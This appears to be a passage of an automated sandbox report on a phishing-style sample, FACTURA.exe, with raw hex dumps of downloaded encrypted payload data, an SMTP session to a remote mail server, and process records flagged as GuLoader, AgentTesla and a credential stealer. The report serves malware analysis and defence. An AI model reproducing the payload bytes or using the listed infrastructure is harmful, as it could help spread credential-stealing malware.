                                          2021-09-28 06:58:06 UTC207INData Raw: 5d a8 ed ab 66 19 ea 52 98 7f 3e dc ce c2 da 26 12 5d a4 3e 93 65 29 c3 7f 7b fe 10 cb 6d 59 81 b6 38 7a 50 67 70 de e7 5e 68 d3 12 8c de c4 b3 1a a7 24 76 7c 32 3d d4 c3 50 ca 8d 17 de 86 a8 3d 41 21 bb 5c 44 44 4a b7 70 77 9e 43 97 ef fc a7 a2 91 1e bd 9e ea 60 ec 01 ec 8e 40 42 88 0c 38 2e 27 17 1b a1 52 3c 2c 59 99 2e 22 31 e6 4c 45 d2 fb de fd d4 36 66 4e 35 3b 07 b8 89 42 ae 40 c8 28 27 38 f4 46 6d d7 b8 1f 4c 56 12 87 89 06 d3 d3 c1 de f9 51 e1 5f b7 ee bf da 45 e2 78 c1 33 1b 8d 20 63 56 6c 8a 87 a8 85 c6 d4 54 9c 36 e9 42 68 d4 49 d6 1f 47 f8 05 b5 77 81 26 ac 81 ae 3d 00 4c 26 5f 28 c6 8e 2c 02 4a 78 08 13 6f 0c ce b2 1a e0 c2 31 c8 94 50 fa f5 19 53 93 f9 d2 57 d4 38 0d d8 57 81 b2 81 9e 39 ae 84 59 56 b7 e6 7d 74 5f 5f 35 03 2b c6 38 53 95 8e
                                          Data Ascii: ]fR>&]>e){mY8zPgp^h$v|2=P=A!\DDJpwC`@B8.'R<,Y."1LE6fN5;B@('8FmLVQ_Ex3 cVlT6BhIGw&=L&_(,Jxo1PSW8W9YV}t__5+8S
                                          2021-09-28 06:58:06 UTC208INData Raw: 36 b3 b4 4d 6f 1a ef 39 59 d9 78 e5 4a 77 00 2b 92 95 5d 43 7e 63 c4 d7 98 bb 6d 56 42 48 49 77 de 0a 12 34 8f 59 19 16 44 8a 7b 2a e8 44 97 44 3e 6f 67 19 45 d1 dc 7a 15 bc b4 fb 88 f5 66 e6 8d 9f 63 5e d3 75 9e 5c 93 a4 dd 0b eb f0 78 2e 72 b9 ef 47 69 ea ed 7c 68 1c 6c 59 8c 39 73 3c aa 0d 54 73 ea 31 76 0a 79 65 e2 b1 e2 b8 a2 ed 9f 83 9d 33 34 d6 cf 6c 3e db d5 e7 5e 8a d0 b4 45 c9 36 29 25 54 2f d6 3f 16 f5 b3 a0 ce 0b 06 ad 8f 23 f6 05 b3 33 ad b6 28 05 18 8a db 27 c6 32 05 42 84 99 d6 84 e2 7e 6d a1 df 2b a4 6a 06 18 48 27 ba 74 e4 fe 2a 13 07 78 a3 ca 3f 23 28 ec b7 28 b1 a9 41 8b ba 21 92 a0 d4 eb 83 64 ba 09 b5 2b 7b c1 70 b2 f4 86 ad 69 c8 2a 17 ef fb e7 1d be 18 04 87 1f a3 ef 87 83 3a 76 9b b3 07 32 77 eb ca a2 11 cc c6 15 ba e5 98 1b b5 95
                                          Data Ascii: 6Mo9YxJw+]C~cmVBHIw4YD{*DD>ogEzfc^u\x.rGi|hlY9s<Ts1vye34l>^E6)%T/?#3('2B~m+jH't*x?#((A!d+{pi*:v2w
                                          2021-09-28 06:58:06 UTC209INData Raw: 52 b7 ae 5f 75 be f6 7d 5c 1d 6a 4e 21 68 b0 94 55 b8 46 e0 98 87 74 32 67 34 88 a3 71 5a da 68 28 d6 c5 70 1a 54 c1 f8 5a 2e da 80 39 3b 38 3b 77 7b d8 47 29 b4 09 fe ec a6 29 c8 3c 74 89 bf 5b fa 30 c9 89 2b e0 5a 7d 27 cb 19 cc 85 e8 bb cc 21 f4 85 9c 7f 5c ba ba bf 8a e4 86 52 e5 c9 40 ee ad 34 a9 eb e5 10 26 2e 3b e7 73 73 cd 53 c8 55 c1 67 a6 bb d3 48 bb 45 76 5a b2 99 f1 b2 e9 1b 8d 63 b4 c0 bc 20 96 1d e9 22 ce e2 e4 fa 28 e1 fd dd 76 78 8f 7c 90 b4 2a e6 9e c3 24 2b 84 ad 18 1d 20 90 cc f8 7c 63 5d 31 4d 7e bb b0 06 c9 b9 f4 ea 4b 0e 49 ef 30 98 7a 23 8f d1 73 61 72 c2 a7 4e d2 a5 61 f8 63 1d c4 6b 3c 44 9a 00 e8 0c a2 d1 89 43 5e 04 0d ee eb 6f 64 b4 2b 5b 7e d4 63 56 9f b2 84 6a f3 d8 75 14 da fa 51 af cc 37 3b 67 e5 1b fa b5 80 33 84 89 99 68
                                          Data Ascii: R_u}\jN!hUFt2g4qZh(pTZ.9;8;w{G))<t[0+Z}'!\R@4&.;ssSUgHEvZc "(vx|*$+ |c]1M~KI0z#sarNack<DC^od+[~cVjuQ7;g3h
                                          2021-09-28 06:58:06 UTC210INData Raw: 18 86 30 19 80 e0 70 3d 3e 0e fd f0 6f 82 9c af a9 80 3f 93 3c df bd db aa 2f 96 1a 90 5d 7c eb a1 9d 32 06 d5 db d4 70 2e a7 24 fd da 1a 20 59 ac 39 b6 ce b1 8b 64 a7 a5 aa 57 d6 8f cb 56 7a 0f 43 22 db 2b 8f 51 69 2c a6 e5 69 0f f9 57 f5 7c 11 d5 5a bf d4 b4 cf 83 72 2e e5 eb f3 31 c9 5a 33 af 5c c1 be e2 82 4e b4 e2 30 1c b3 98 5a 09 52 28 10 78 31 a0 51 26 99 e8 85 b5 48 c6 52 46 e3 a5 2f ed 51 d3 e7 19 8a 49 09 30 aa 03 a0 8b e4 b4 cc 21 ff 8c 8c 04 13 db ad d6 99 9f f1 35 e4 a7 5b 89 ad dc ba 8c e5 f8 31 49 27 80 73 9b d6 28 5b 2d d6 c6 e6 bb 3b 57 d7 77 2b 5a b2 29 e9 9c fc 18 8d d3 b1 f2 3c 7c 89 9f f0 2a d9 f3 45 63 22 f7 7c 9c 7d 64 8a 72 80 38 8e e5 8b d3 a8 bf 8d a7 15 09 3c 1c 50 f9 68 7f cd 5d 41 77 b2 ba 00 c1 b9 10 bc 2d 12 2e e5 24 aa 1c
                                          Data Ascii: 0p=>o?</]|2p.$ Y9dWVzC"+Qi,iW|Zr.1Z3\N0ZR(x1Q&HRF/QI0!5[1I's([-;Ww+Z)<|*Ec"|}dr8<Ph]Aw-.$
                                          2021-09-28 06:58:06 UTC211INData Raw: 55 2a c1 8c 50 56 96 de d1 a5 89 49 fc 7f 57 9b 74 e9 53 c4 e3 47 6f 66 e1 b4 56 ad b0 5a 1c f3 fd a3 ed b4 09 9b e4 b0 41 da 1d 1d 6b 11 25 c8 02 90 b2 7b 6c 68 02 cf d8 f4 7d 4f 80 e9 47 db cc 3d 82 fe 48 e6 d5 bc 99 e7 1e d6 5f c7 46 09 a5 75 fc 91 ea cd 3b a3 db 66 80 84 35 6a db 6a 7b 87 59 db 9e ca f4 49 09 f2 af 49 45 90 16 a5 ca 7f a4 17 4e c8 98 fd 06 f2 f2 46 9f 61 44 a4 c1 f8 ff df 3c 42 0c cd 20 fc eb 9c eb 8e c1 e3 d6 dd bd 39 ec 62 3a 44 6b 6c b1 98 4e d8 86 66 5f 81 73 00 6e c4 41 67 07 26 28 d4 a2 e9 01 71 8c 36 d3 19 48 e5 af a5 bc 5a 1c 33 c6 4f de a6 9f b8 19 07 f6 72 ae 18 14 bc d7 5c 16 10 06 18 be 8e 50 25 b6 62 d2 b8 ab cf 51 d9 d3 55 05 35 70 b4 bb 0c b5 f3 6e b3 f0 a0 77 2c 43 d2 30 19 29 27 db 07 07 90 1c da 8f ec ca d5 d0 5b de
                                          Data Ascii: U*PVIWtSGofVZAk%{lh}OG=H_Fu;f5jj{YIIENFaD<B 9b:DklNf_snAg&(q6HZ3Or\P%bQU5pnw,C0)'[
                                          2021-09-28 06:58:06 UTC212INData Raw: a5 f2 3c a5 99 10 dc 30 4d 78 c5 e8 a2 a5 f3 d2 75 76 0b dc 9f ab 4e eb 83 c4 3b a7 cc bb 71 14 33 93 c1 f2 7d 6e 5d 9b 8b 65 ad 3a c5 c8 ae b1 f8 3c 9c b1 ea 2d 89 0a 35 0e 48 60 16 f5 82 a8 5d ce cc 03 f3 0b 19 be 79 d4 61 e6 81 be 04 b8 d3 a1 4d 52 80 39 e2 f7 7f e4 10 b7 77 7d 3c 58 d1 3e b5 b9 7a 73 f3 6c 96 0a e3 d0 89 c3 b3 0b 66 ff 1c e5 39 5f 20 81 9d 99 7b 96 96 e1 24 f1 2d 9f 19 4d 3f 87 20 19 dc 5b 48 e1 48 bf 16 3b 97 36 bb cf c6 24 e0 1c 9a 55 b3 90 26 f3 1e a3 65 4a 61 74 57 d6 95 d8 55 af 4d 51 4c 20 2c 71 02 d6 00 a0 55 a6 08 12 50 5f c5 d1 07 31 2f 00 85 b8 dc c2 5a 31 1f 3c 2f 25 fa 6d 39 47 b8 2b 24 16 66 ef 49 75 ec 25 af 25 14 06 59 60 0e 80 e5 1b 34 d5 8e 82 c7 9a 46 b9 99 ee 44 3f ec 1c be 25 c6 cb fb 54 f5 9e 45 5f 5e d8 d9 2e 7c
                                          Data Ascii: <0MxuvN;q3}n]e:<-5H`]yaMR9w}<X>zslf9_ {$-M? [HH;6$U&eJatWUMQL ,qUP_1/Z1</%m9G+$fIu%%Y`4FD?%TE_^.|
                                          2021-09-28 06:58:06 UTC214INData Raw: 0b 87 74 d7 53 1a 13 0e 0b be 9d 50 27 be 77 4d fb ad c1 5a c0 5f 16 19 b0 35 bc a7 12 a7 e0 7a a6 f6 a8 7e 27 4e d6 32 04 29 2a da 00 07 9f 11 da 95 8d d9 de d2 7d d6 e2 9d 18 90 09 b9 ca 39 2e ea f9 e4 41 4a 78 6c cc 28 32 76 2c e5 43 5e 5b bd 25 2a a8 8b de be a6 56 37 2c 4c 5a 15 5e 75 37 e3 91 e7 4f 41 b9 1e 22 0b 09 a8 7e 2c a1 03 f2 6f 67 9e 19 b6 b8 1d 63 9d 57 d3 a0 d4 ba b2 26 0f b1 5c 7b 7a 35 16 13 19 c7 4d df f9 a5 86 3b ef d9 a7 29 33 a5 23 b1 5d a9 13 70 a7 a5 ae 41 ca 00 50 59 66 92 16 22 37 af 80 4d 0e 30 35 15 61 18 65 cb fa 7c 11 d5 5a b8 af 3d 96 8e 75 30 e6 fb 9b 33 bd 56 5a b5 36 d9 d6 f5 e7 5b d5 fe 57 00 c7 84 3d 13 26 34 71 60 5f b4 25 3a fe f4 e4 ba 2f dc 19 53 81 a2 54 7e a1 c0 9c 8a a3 4e 72 a3 5a 10 db 04 aa a7 cc 21 ed 8c 8c
                                          Data Ascii: tSP'wMZ_5z~'N2)*}9.AJxl(2v,C^[%*V7,LZ^u7OA"~,ogcW&\{z5M;)3#]pAPYf"7M05ae|Z=u03VZ6[W=&4q`_%:/ST~NrZ!
                                          2021-09-28 06:58:06 UTC215INData Raw: 7c 04 41 b5 78 69 c6 62 2a 72 97 63 e1 01 67 2a 65 e9 30 4c 84 a2 62 4b 95 bb 99 70 d7 ce 8c 9d 8b 94 08 ca e0 18 36 b8 19 e4 37 12 56 a5 5c aa 98 3d 5e 15 59 1e 2d 17 94 eb 13 10 6d 2e 2c f0 58 14 48 c3 7b 2b 6e 9c 5c 4b 52 1e 02 99 5f 09 d0 c4 15 df c5 f6 c1 d9 b2 b0 c3 2d ab a4 13 b5 e2 b1 df c4 c4 46 69 5e 36 56 8b cc ca 99 d6 c6 36 4f 47 e0 f3 54 8e 6c f1 4a cb 8b 46 78 e9 af a1 4e b1 2e 49 1d eb e5 ba e2 30 5b 11 f9 a5 59 da 12 68 61 24 35 48 88 91 b4 68 e0 2c 03 d4 c4 78 7c 58 9c 66 1e dd df 36 85 ea 4a f2 c2 34 b1 ec 04 5d 64 da 41 1e bd 6d f1 95 f7 cd 32 bb 79 66 82 8b b2 67 d9 7d 78 8f 50 c1 9f d9 e3 2c 00 f0 da 53 57 11 90 c0 cb 66 bd 96 65 c7 e4 fd 09 74 aa 54 85 78 47 a6 cf 64 d6 c5 b9 0f 1f b5 bf c5 e3 ba ea 8e c1 e0 13 d5 97 38 f3 72 a7 94
                                          Data Ascii: |Axib*rcg*e0LbKp67V\=^Y-m.,XH{+n\KR_-Fi^6V6OGTlJFxN.I0[Yha$5Hh,x|Xf6J4]dAm2yfg}xP,SWfetTxGd8r
                                          2021-09-28 06:58:06 UTC216INData Raw: 48 58 b5 24 50 56 e1 68 dd db f0 58 06 cb 09 b2 10 3b 38 6b e8 5d a0 ba 31 e2 78 e9 a3 3c c5 bb f8 8e b7 47 f4 24 c7 8e 0a e4 4a e3 a3 da 16 dd 87 e1 a6 ca 27 ec 93 1e c9 09 ae b5 a3 81 fc ff 54 f1 c9 41 e8 b7 bd ac f8 e6 11 8b 24 28 f8 e1 56 c0 41 48 4a cf 43 86 a8 50 4e aa 62 7b 55 2f 80 f6 9a e1 15 04 6b b3 e8 a0 20 85 02 d4 20 c4 e6 c3 ff 2b eb f5 d4 73 61 ab 7e 9f b1 29 e9 99 c7 35 3b 82 b4 16 14 26 95 c0 ff 7e 70 49 04 47 6b 3c 49 22 d3 bc 84 ea af 85 21 f5 ac ca 07 29 93 c3 0c 0c 7a df a3 41 41 80 67 e1 09 0b 59 cd b3 7c 8d 89 c5 16 c3 dc b4 4d 47 8d 2c ef ee 4d 64 a4 b2 70 64 55 4f 58 87 bc 91 70 62 ef fd a0 d2 c8 d2 8b cf 35 87 72 61 8c f8 ba 86 30 86 94 97 67 93 8b e4 39 f4 3d 83 1c 5c bf 3b 32 72 c1 5e 4f e1 4a bf 0b 38 82 21 28 7c ce 39 e2 95
                                          Data Ascii: HX$PVhX;8k]1x<G$J'TA$(VAHJCPNb{U/k +sa~)5;&~pIGk<I"!)zAAgY|MG,MdpdUOXpb5ra0g9=\;2r^OJ8!(|9
                                          2021-09-28 06:58:06 UTC217INData Raw: 7d 92 4a 47 02 d6 e3 d5 e2 ee b4 52 55 1e 80 a5 cb 7f a8 8a 7a d7 9a e1 19 f6 e1 4b 03 44 5e 86 df e7 f1 57 d6 4c 04 fc a3 c7 f7 1a 07 9d 53 b6 4e d4 b1 24 ea 6a 25 53 e3 a9 bd 1d da ce a6 6c 5d 9b 6c 93 b1 c6 71 6c 16 3c b8 09 a3 64 d0 78 8e 3e df 1b 50 86 a6 ac b7 50 10 28 40 7f c5 06 44 b4 03 8f 12 67 b3 1c 1d d2 d8 4e 03 92 91 04 a2 13 b2 2d b8 68 dd 36 41 d3 d9 24 44 09 89 97 79 a8 27 fd a1 fb 63 2f 57 a9 6d a4 aa dd 32 07 25 39 c0 80 e7 8b 13 55 04 84 c5 56 39 73 d9 e9 8e 15 9f 06 a7 c5 36 1b f9 71 74 4e 43 62 7f d4 34 bd 0d 2c ee 4c 49 48 b0 30 21 a0 8e c3 bb bc 5d 10 2a 5a 4a 0e d9 cc 37 f0 02 27 b6 5c 3f 80 3e 1c 95 ed 62 bf 57 0f e5 eb 6f 89 92 ab ad 9e 2a 87 3a fb bc d3 a2 38 80 0f 9b 41 6c eb a1 65 2e 1d dd cb c6 f0 be a3 30 f8 7a b8 26 10 a8
                                          Data Ascii: }JGRUzKD^WLSN$j%Sl]lql<dx>PP(@DgN-h6A$Dy'c/Wm2%9UV9s6qtNCb4,LIH0!]*ZJ7'\?>bWo*:8Ale.0z&
                                          2021-09-28 06:58:06 UTC219INData Raw: 55 9d a2 9e 70 6e e0 78 09 c7 f5 cc 97 c2 ab 0a 7e e7 11 f0 bd 94 b7 87 91 97 66 81 0f e5 3f f3 33 9f 19 4d d6 31 12 73 dc 5b 52 e4 57 b4 16 3b 80 34 ae d5 c5 2c f7 93 0b 5c b5 8f 34 71 82 ac 7a c0 6c 7b dd d7 97 df 52 b4 4d 51 48 24 2a 62 87 5e 23 a7 7b bb 3d 0f 64 4d 9e d9 33 32 06 05 a2 3c e7 ca 65 36 24 21 13 37 39 7c 73 5e fc 27 7d 13 3e ea 12 70 b6 20 fa 20 40 03 0e 65 58 85 b4 1e 64 d0 c8 90 e1 96 16 bd d5 eb 0b 3a a2 19 f7 20 8e ce bf 53 a5 83 18 42 02 c5 86 33 18 81 6c 0b 1f ec 22 3b 97 5e 1c 4b de 7c 30 76 84 51 1f 50 14 12 96 db c5 d6 f0 89 9a cd e1 5d 45 af b0 c3 6d a3 b3 8f 29 ff b6 4d e5 92 c5 c7 42 b9 4b 85 51 4f 84 df c8 ab 19 2d fc 7c 5a 94 f1 08 4a cb 67 52 77 6d fd 28 5b ad b3 4f 0f eb e5 ba e2 d8 06 05 ec b1 59 c8 12 68 71 2d 3a d5 0c
                                          Data Ascii: Upnx~f?3M1s[RW;4,\4qzl{RMQH$*b^#{=dM32<e6$!79|s^'}>p @eXd: SB3l";^K|0vQP]Em)MBKQO-|ZJgRwm([OYhq-:
                                          2021-09-28 06:58:06 UTC220INData Raw: ec 36 f0 10 a6 5a 53 38 ef 23 19 08 e8 70 3e 22 12 e0 ec 72 8c 9a af aa 9c 23 8e 3e db bd da a8 b3 87 0a 91 5c 69 f9 20 10 33 18 d5 ce c6 f1 a3 a6 3a fc 5a ba 27 1a a2 bc a4 4f 28 2a f1 b6 24 52 56 d8 81 c9 58 74 13 56 30 5a b2 ee dc 64 3e cd 79 7c 1d 78 ce f4 6e 90 95 54 aa 7a 37 bf 80 7c 20 b1 f9 c9 23 ff 48 0c bd 70 d3 85 f0 b8 5c 94 f0 16 0e 94 8a 6c 1b 72 3a 37 6a 1e b2 77 34 f0 fa ec a7 9c d0 d4 aa 8a b7 47 ff 38 c1 8e 0b e3 5b 60 22 c3 11 c9 85 ea ba c2 2f ce 82 9e 6d 01 b2 bf bf 8f f6 e3 5c f7 ce 49 e0 bf b5 a8 e5 f7 91 23 20 35 e9 61 f2 80 41 49 44 c5 47 f0 a9 33 45 cc 65 30 48 5a 88 98 92 8c 09 45 76 de e0 db 3c f7 1e c9 22 cc e1 e0 fa 27 e5 fd dc 2f 64 f9 7c f0 b9 49 e3 ed c1 45 26 ed a9 6c 1c 47 9d a6 f8 13 6d 4c 19 42 79 bc b8 b8 d0 b7 93 f8
                                          Data Ascii: 6ZS8#p>"r#>\i 3:Z'O(*$RVXtV0Zd>y|xnTz7| #Hp\lr:7jw4G8[`"/m\I# 5aAIDG3Ee0HZEv<"'/d|IE&lGmLBy
                                          2021-09-28 06:58:06 UTC221INData Raw: e3 a4 cd 45 80 45 67 50 38 43 99 4d 53 98 c3 d4 b7 0b 44 ee fd 5a 86 71 f4 56 d9 e6 5a 6a 68 ef a9 53 bf 32 47 01 f6 e0 a6 f0 b1 1b 19 f1 ad 44 d4 0f 74 6c 31 27 c9 11 90 a1 7a 61 68 00 da ca 76 74 4d 8e e7 5a de d1 38 8b f9 4d fb d0 b6 84 e2 16 de 59 c7 44 03 b8 70 f4 9d ea c8 3a b1 59 63 8a 96 b7 6f d1 60 7d 87 58 c6 9b d7 f1 55 0e e2 b3 55 57 10 82 b9 d6 63 b5 96 67 d5 9d e1 1b f7 ef 5a 82 7d 59 a6 dd e5 e3 d7 3a 42 0d dc a1 c5 e5 9a eb 8f d3 63 42 d3 b7 39 ef 60 27 41 63 7c a0 18 d2 c9 f6 6d 57 9d 7d 10 60 9c 67 6f 17 2e 38 dc b2 e7 09 7a 8b 3e dd 11 5a 8c a1 ab b4 52 12 3a c1 4a cc 26 46 b6 11 0f fe 77 ae 19 06 d5 df 5b 11 13 08 05 b0 93 5e 2f b6 66 cf b6 a5 c1 59 c8 51 18 08 32 78 ba a7 11 a9 ee 72 ae f2 a8 7f 24 46 d2 32 05 27 29 d2 00 03 9e 01 d4
                                          Data Ascii: EEgP8CMSDZqVZjhS2GDtl1'zahvtMZ8MYDp:Yco`}XUUWcgZ}Y:BcB9`'Ac|mW}`go.8z>ZR:J&Fw[^/fYQ2xr$F2')


                                          SMTP Packets

                                          TimestampSource PortDest PortSource IPDest IPCommands
                                          Sep 28, 2021 08:59:41.887249947 CEST58749795109.169.39.245192.168.11.20220-s3.xperimenta.net ESMTP Exim 4.91 #1 Tue, 28 Sep 2021 08:59:41 +0200
                                          220-We do not authorize the use of this system to transport unsolicited,
                                          220 and/or bulk e-mail.
                                          Sep 28, 2021 08:59:41.887545109 CEST49795587192.168.11.20109.169.39.245EHLO 927537
                                          Sep 28, 2021 08:59:41.906946898 CEST58749795109.169.39.245192.168.11.20250-s3.xperimenta.net Hello 927537 [84.17.52.54]
                                          250-SIZE 94371840
                                          250-8BITMIME
                                          250-PIPELINING
                                          250-AUTH PLAIN LOGIN
                                          250-STARTTLS
                                          250 HELP
                                          Sep 28, 2021 08:59:41.907228947 CEST49795587192.168.11.20109.169.39.245STARTTLS
                                          Sep 28, 2021 08:59:41.929550886 CEST58749795109.169.39.245192.168.11.20220 TLS go ahead

                                          Code Manipulations

                                          Statistics

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Start time:08:57:18
                                          Start date:28/09/2021
                                          Path:C:\Users\user\Desktop\FACTURA.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                          Imagebase:0x400000
                                          File size:90112 bytes
                                          MD5 hash:DBE61CFD43C95752F6DFBDE236558782
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Visual Basic
                                          Yara matches:
                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.17251666746.00000000007B0000.00000040.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:08:57:42
                                          Start date:28/09/2021
                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\FACTURA.exe'
                                          Imagebase:0xa70000
                                          File size:65440 bytes
                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:.Net C# or VB.NET
                                          Yara matches:
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.21802616572.000000001DEC1000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:08:57:42
                                          Start date:28/09/2021
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6b4380000
                                          File size:875008 bytes
                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:moderate

                                          Disassembly

                                          Code Analysis

                                          Reset < >